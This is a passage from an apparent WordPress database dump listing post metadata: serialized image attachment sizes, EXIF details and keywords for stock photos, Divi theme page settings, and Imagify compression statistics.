:\"image/jpeg\";s:8:\"filesize\";i:50016;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49528;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105308;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44670;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"81\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(1520,426,'_thumbnail_id','427'),(1521,426,'_et_post_bg_color','#ffffff'),(1522,426,'_et_post_bg_layout','light'),(1523,426,'_et_pb_show_title','on'),(1524,426,'_et_pb_post_hide_nav','default'),(1525,426,'_et_pb_page_layout','et_right_sidebar'),(1526,426,'_et_pb_side_nav','off'),(1530,426,'_et_pb_use_builder',''),(1531,426,'_et_pb_first_image',''),(1532,426,'_et_pb_truncate_post',''),(1533,426,'_et_pb_truncate_post_date',''),(1534,426,'_et_pb_old_content',''),(1535,431,'_edit_lock','1679406307:3'),(1536,431,'_edit_last','3'),(1537,432,'_wp_attached_file','2023/03/Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1.jpg'),(1538,432,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:63:\"2023/03/Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1.jpg\";s:8:\"filesize\";i:938570;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39902;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24681;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:174592;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56337;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61757;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95047;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91983;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:266765;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:63:\"Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78167;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"71\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(1539,431,'_thumbnail_id','432'),(1540,431,'_et_post_bg_color','#ffffff'),(1541,431,'_et_post_bg_layout','light'),(1542,431,'_et_pb_show_title','on'),(1543,431,'_et_pb_post_hide_nav','default'),(1544,431,'_et_pb_page_layout','et_right_sidebar'),(1545,431,'_et_pb_side_nav','off'),(1548,431,'_et_pb_use_builder',''),(1549,431,'_et_pb_first_image',''),(1550,431,'_et_pb_truncate_post',''),(1551,431,'_et_pb_truncate_post_date',''),(1552,431,'_et_pb_old_content',''),(1553,436,'_edit_lock','1679408329:3'),(1554,436,'_edit_last','3'),(1555,436,'_thumbnail_id','281'),(1556,436,'_et_post_bg_color','#ffffff'),(1557,436,'_et_post_bg_layout','light'),(1558,436,'_et_pb_show_title','on'),(1559,436,'_et_pb_post_hide_nav','default'),(1560,436,'_et_pb_page_layout','et_right_sidebar'),(1561,436,'_et_pb_side_nav','off'),(1568,436,'_et_pb_use_builder',''),(1569,436,'_et_pb_first_image',''),(1570,436,'_et_pb_truncate_post',''),(1571,436,'_et_pb_truncate_post_date',''),(1572,436,'_et_pb_old_content',''),(1582,453,'_edit_lock','1679409406:3'),(1583,453,'_edit_last','3'),(1584,454,'_wp_attached_file','2023/03/Super-macro-mosquito-1000x667-1.jpg'),(1585,454,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:43:\"2023/03/Super-macro-mosquito-1000x667-1.jpg\";s:8:\"filesize\";i:297863;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45587;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40498;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78327;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50799;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52327;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61028;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63853;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97045;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:43:\"Super-macro-mosquito-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56558;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"22\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D750\";s:7:\"caption\";s:34:\"Super macro mosquito sucking blood\";s:17:\"created_timestamp\";s:10:\"1500638477\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:34:\"Super macro mosquito sucking blood\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:31:{i:0;s:8:\"mosquito\";i:1;s:4:\"bite\";i:2;s:7:\"disease\";i:3;s:5:\"aedes\";i:4;s:5:\"human\";i:5;s:5:\"blood\";i:6;s:5:\"close\";i:7;s:5:\"macro\";i:8;s:4:\"skin\";i:9;s:7:\"malaria\";i:10;s:6:\"dengue\";i:11;s:6:\"health\";i:12;s:7:\"sucking\";i:13;s:8:\"medicine\";i:14;s:6:\"insect\";i:15;s:5:\"virus\";i:16;s:8:\"sickness\";i:17;s:5:\"super\";i:18;s:5:\"sting\";i:19;s:8:\"epidemic\";i:20;s:10:\"infectious\";i:21;s:6:\"nature\";i:22;s:4:\"lyme\";i:23;s:6:\"animal\";i:24;s:6:\"detail\";i:25;s:5:\"small\";i:26;s:7:\"biology\";i:27;s:10:\"mosquitoes\";i:28;s:7:\"serious\";i:29;s:6:\"sucker\";i:30;s:9:\"mosquitos\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"93\";s:8:\"quantity\";d:100;s:4:\"webp\";i:0;}}'),(1586,453,'_thumbnail_id','454'),(1587,453,'_et_post_bg_color','#ffffff'),(1588,453,'_et_post_bg_layout','light'),(1589,453,'_et_pb_show_title','on'),(1590,453,'_et_pb_post_hide_nav','default'),(1591,453,'_et_pb_page_layout','et_right_sidebar'),(1592,453,'_et_pb_side_nav','off'),(1594,453,'_et_pb_use_builder',''),(1595,453,'_et_pb_first_image',''),(1596,453,'_et_pb_truncate_post',''),(1597,453,'_et_pb_truncate_post_date',''),(1598,453,'_et_pb_old_content',''),(1599,457,'_edit_lock','1679409979:3'),(1600,457,'_edit_last','3'),(1601,457,'_thumbnail_id','302'),(1602,457,'_et_post_bg_color','#ffffff'),(1603,457,'_et_post_bg_layout','light'),(1604,457,'_et_pb_show_title','on'),(1605,457,'_et_pb_post_hide_nav','default'),(1606,457,'_et_pb_page_layout','et_right_sidebar'),(1607,457,'_et_pb_side_nav','off'),(1610,457,'_et_pb_use_builder',''),(1611,457,'_et_pb_first_image',''),(1612,457,'_et_pb_truncate_post',''),(1613,457,'_et_pb_truncate_post_date',''),(1614,457,'_et_pb_old_content',''),(1615,461,'_edit_lock','1679410560:3'),(1616,461,'_edit_last','3'),(1617,461,'_et_post_bg_color','#ffffff'),(1618,461,'_et_post_bg_layout','light'),(1619,461,'_et_pb_show_title','on'),(1620,461,'_et_pb_post_hide_nav','default'),(1621,461,'_et_pb_page_layout','et_right_sidebar'),(1622,461,'_et_pb_side_nav','off'),(1629,461,'_et_pb_use_builder',''),(1630,461,'_et_pb_first_image',''),(1631,461,'_et_pb_truncate_post',''),(1632,461,'_et_pb_truncate_post_date',''),(1633,461,'_et_pb_old_content',''),(1625,464,'_wp_attached_file','2023/03/Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1.jpg'),(1626,464,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:80:\"2023/03/Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1.jpg\";s:8:\"filesize\";i:367047;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38467;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31540;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83834;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44963;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47607;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59869;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61458;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111582;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:80:\"Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53143;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.5\";s:6:\"credit\";s:32:\"Viacheslav Yakobchuk - stock.ado\";s:6:\"camera\";s:10:\"NIKON D850\";s:7:\"caption\";s:105:\"Water before breakfast. Slim and fit woman with many little braids drinking water before having breakfast\";s:17:\"created_timestamp\";s:10:\"1551875603\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"85\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:57:\"Slim and fit woman drinking water before having breakfast\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:45:{i:0;s:5:\"water\";i:1;s:8:\"drinking\";i:2;s:7:\"thirsty\";i:3;s:4:\"girl\";i:4;s:5:\"woman\";i:5;s:5:\"young\";i:6;s:6:\"female\";i:7;s:10:\"dreadlocks\";i:8;s:11:\"dark-haired\";i:9;s:6:\"braids\";i:10;s:12:\"generation Y\";i:11;s:13:\"domestic life\";i:12;s:4:\"cute\";i:13;s:4:\"slim\";i:14;s:3:\"fit\";i:15;s:7:\"fitness\";i:16;s:4:\"body\";i:17;s:4:\"loft\";i:18;s:9:\"apartment\";i:19;s:4:\"room\";i:20;s:4:\"home\";i:21;s:8:\"interior\";i:22;s:12:\"life balance\";i:23;s:6:\"health\";i:24;s:17:\"healthy lifestyle\";i:25;s:9:\"lifestyle\";i:26;s:11:\"weight loss\";i:27;s:7:\"morning\";i:28;s:7:\"routine\";i:29;s:8:\"everyday\";i:30;s:7:\"process\";i:31;s:10:\"motivation\";i:32;s:9:\"breakfast\";i:33;s:12:\"healthy diet\";i:34;s:4:\"diet\";i:35;s:9:\"nutrition\";i:36;s:10:\"nourishing\";i:37;s:6:\"useful\";i:38;s:6:\"fruits\";i:39;s:7:\"excited\";i:40;s:5:\"happy\";i:41;s:9:\"low angle\";i:42;s:8:\"waist up\";i:43;s:5:\"glass\";i:44;s:16:\"african american\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"86\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(1627,461,'_thumbnail_id','464'),(1646,467,'_wp_attached_file','2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg'),(1647,467,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:1043;s:4:\"file\";s:67:\"2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\";s:8:\"filesize\";i:445726;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-300x122.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:122;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28966;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"Downtown-Houston-skyline-Black-White-6139-x-2500-1024x417.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:417;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98172;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25608;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-768x313.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:313;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66253;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"Downtown-Houston-skyline-Black-White-6139-x-2500-1536x626.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:626;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185802;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:61:\"Downtown-Houston-skyline-Black-White-6139-x-2500-2048x834.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:834;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:300644;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40185;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:61:\"Downtown-Houston-skyline-Black-White-6139-x-2500-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147517;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42494;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56717;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:61:\"Downtown-Houston-skyline-Black-White-6139-x-2500-1080x440.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105648;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57765;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:62:\"Downtown-Houston-skyline-Black-White-6139-x-2500-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:812539;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:61:\"Downtown-Houston-skyline-Black-White-6139-x-2500-1280x522.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137732;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-980x399.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91840;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:60:\"Downtown-Houston-skyline-Black-White-6139-x-2500-480x196.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39741;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:26:\"f11photo - stock.adobe.com\";s:6:\"camera\";s:9:\"ILCE-7RM2\";s:7:\"caption\";s:49:\"Downtown Houston skyline in Texas USA at twilight\";s:17:\"created_timestamp\";s:10:\"1479365062\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"23\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:3:\"3.2\";s:5:\"title\";s:24:\"Downtown Houston skyline\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:48:{i:0;s:7:\"houston\";i:1;s:5:\"texas\";i:2;s:7:\"skyline\";i:3;s:4:\"city\";i:4;s:8:\"downtown\";i:5;s:12:\"architecture\";i:6;s:9:\"cityscape\";i:7;s:6:\"modern\";i:8;s:4:\"view\";i:9;s:4:\"town\";i:10;s:3:\"usa\";i:11;s:8:\"business\";i:12;s:9:\"landscape\";i:13;s:4:\"park\";i:14;s:6:\"travel\";i:15;s:4:\"blue\";i:16;s:5:\"green\";i:17;s:5:\"urban\";i:18;s:6:\"office\";i:19;s:4:\"high\";i:20;s:6:\"scenic\";i:21;s:8:\"landmark\";i:22;s:9:\"financial\";i:23;s:10:\"skyscraper\";i:24;s:10:\"metropolis\";i:25;s:3:\"sky\";i:26;s:12:\"construction\";i:27;s:4:\"lawn\";i:28;s:8:\"twilight\";i:29;s:5:\"night\";i:30;s:2:\"tx\";i:31;s:4:\"dusk\";i:32;s:8:\"american\";i:33;s:7:\"america\";i:34;s:6:\"center\";i:35;s:6:\"united\";i:36;s:6:\"states\";i:37;s:9:\"buildings\";i:38;s:8:\"district\";i:39;s:11:\"sightseeing\";i:40;s:10:\"background\";i:41;s:12:\"metropolitan\";i:42;s:6:\"county\";i:43;s:8:\"highrise\";i:44;s:6:\"towers\";i:45;s:5:\"rises\";i:46;s:6:\"sunset\";i:47;s:7:\"sunrise\";}}s:14:\"original_image\";s:52:\"Downtown-Houston-skyline-Black-White-6139-x-2500.jpg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:1:\"0\";s:8:\"quantity\";d:71;s:4:\"webp\";i:0;}}'),(1654,454,'_imagify_optimization_level','2'),(1655,454,'_imagify_status','success'),(1656,454,'_imagify_data','a:2:{s:5:\"sizes\";a:20:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:297863;s:14:\"optimized_size\";i:69581;s:7:\"percent\";d:76.6400000000000005684341886080801486968994140625;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:56558;s:14:\"optimized_size\";i:8446;s:7:\"percent\";d:85.06999999999999317878973670303821563720703125;}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:97045;s:14:\"optimized_size\";i:22120;s:7:\"percent\";d:77.2099999999999937472239253111183643341064453125;}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:63853;s:14:\"optimized_size\";i:12036;s:7:\"percent\";d:81.150000000000005684341886080801486968994140625;}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:61028;s:14:\"optimized_size\";i:9822;s:7:\"percent\";d:83.909999999999996589394868351519107818603515625;}s:34:\"et-pb-portfolio-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:52327;s:14:\"optimized_size\";i:6750;s:7:\"percent\";d:87.099999999999994315658113919198513031005859375;}s:34:\"et-pb-post-main-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:50799;s:14:\"optimized_size\";i:6362;s:7:\"percent\";d:87.4800000000000039790393202565610408782958984375;}s:25:\"medium_large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:78327;s:14:\"optimized_size\";i:15676;s:7:\"percent\";d:79.9899999999999948840923025272786617279052734375;}s:22:\"thumbnail@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:40498;s:14:\"optimized_size\";i:2714;s:7:\"percent\";d:93.2999999999999971578290569595992565155029296875;}s:19:\"medium@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:45587;s:14:\"optimized_size\";i:4638;s:7:\"percent\";d:89.8299999999999982946974341757595539093017578125;}s:17:\"full@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:297863;s:14:\"optimized_size\";i:24454;s:7:\"percent\";d:91.7900000000000062527760746888816356658935546875;}s:6:\"medium\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:45587;s:14:\"optimized_size\";i:39893;s:7:\"percent\";d:12.4900000000000002131628207280300557613372802734375;}s:9:\"thumbnail\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:40498;s:14:\"optimized_size\";i:38096;s:7:\"percent\";d:5.92999999999999971578290569595992565155029296875;}s:12:\"medium_large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:78327;s:14:\"optimized_size\";i:47105;s:7:\"percent\";d:39.8599999999999994315658113919198513031005859375;}s:21:\"et-pb-post-main-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:50799;s:14:\"optimized_size\";i:40444;s:7:\"percent\";d:20.379999999999999005240169935859739780426025390625;}s:21:\"et-pb-portfolio-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:52327;s:14:\"optimized_size\";i:40868;s:7:\"percent\";d:21.89999999999999857891452847979962825775146484375;}s:28:\"et-pb-portfolio-module-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:61028;s:14:\"optimized_size\";i:42921;s:7:\"percent\";d:29.6700000000000017053025658242404460906982421875;}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:63853;s:14:\"optimized_size\";i:44115;s:7:\"percent\";d:30.910000000000000142108547152020037174224853515625;}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:97045;s:14:\"optimized_size\";i:52152;s:7:\"percent\";d:46.25999999999999801048033987171947956085205078125;}s:30:\"et-pb-image--responsive--phone\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:56558;s:14:\"optimized_size\";i:41739;s:7:\"percent\";d:26.199999999999999289457264239899814128875732421875;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:1687770;s:14:\"optimized_size\";i:569932;s:7:\"percent\";d:66.2300000000000039790393202565610408782958984375;}}'),(1657,432,